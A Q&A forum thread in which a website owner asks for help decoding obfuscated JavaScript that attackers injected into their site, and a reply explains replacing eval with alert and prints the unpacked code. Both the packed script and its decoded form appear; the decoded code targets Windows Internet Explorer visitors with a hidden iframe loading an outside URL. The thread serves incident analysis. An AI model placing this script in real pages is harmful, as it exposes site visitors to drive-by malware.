JavaScript code injected into site: Can you help me decrypt it?

ARandomGenericShrub picture ARandomGenericShrub · Oct 14, 2011 · Viewed 16.6k times · Source

Recently I was the victim of a web attack, which seemed to take various PHP server vars, then forward them to an attackers website. (IPs of visitor/website, referrer, useragent etc, etc.) Then it would get the file it sent the URL request to, and echo() it to source.

I know you get MANY of these sort of requests (Mostly as poor man XSS attempts), but I would really appreciate some help here, as I don't have much experience with JS. It took me several hours of PHP unscrambling to figure at what it did, and after passing some dummy info, it returned this (which was being echoed into source)

<script type='text/javascript'>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height|width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|25u|msie|toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|500|asso|navigator|com|showthread|php|72291731'.split('|'),0,{}))

Thank you for your time and patience with this matter.

Answer

Christian picture Christian · Oct 14, 2011

Simply replace eval with alert.

It yields the following:

function MakeFrameEx(){
    element=document.getElementById('yahoo_api');
    if(!element){
        var el=document.createElement('iframe');
        document.body.appendChild(el);
        el.id='yahoo_api';
        el.style.width='1px';
        el.style.height='1px';
        el.style.display='none';
        el.src='http://asso.25u.com/showthread.php?t=72291731'
    }
}

var ua=navigator.userAgent.toLowerCase();

if(((ua.indexOf("msie")!=-1
    &&ua.indexOf("opera")==-1
    &&ua.indexOf("webtv")==-1))
    &&ua.indexOf("windows")!=-1)
{
    var t=setTimeout("MakeFrameEx()",500);
}

After doing the alert() CTRL+C the dialog to get the contents, then use a JS Beautifier to get some readable code.


Also note that for some browsers, like Firefox, there are plugins to do this automatically. Some browsers even does this automatically (MSIE).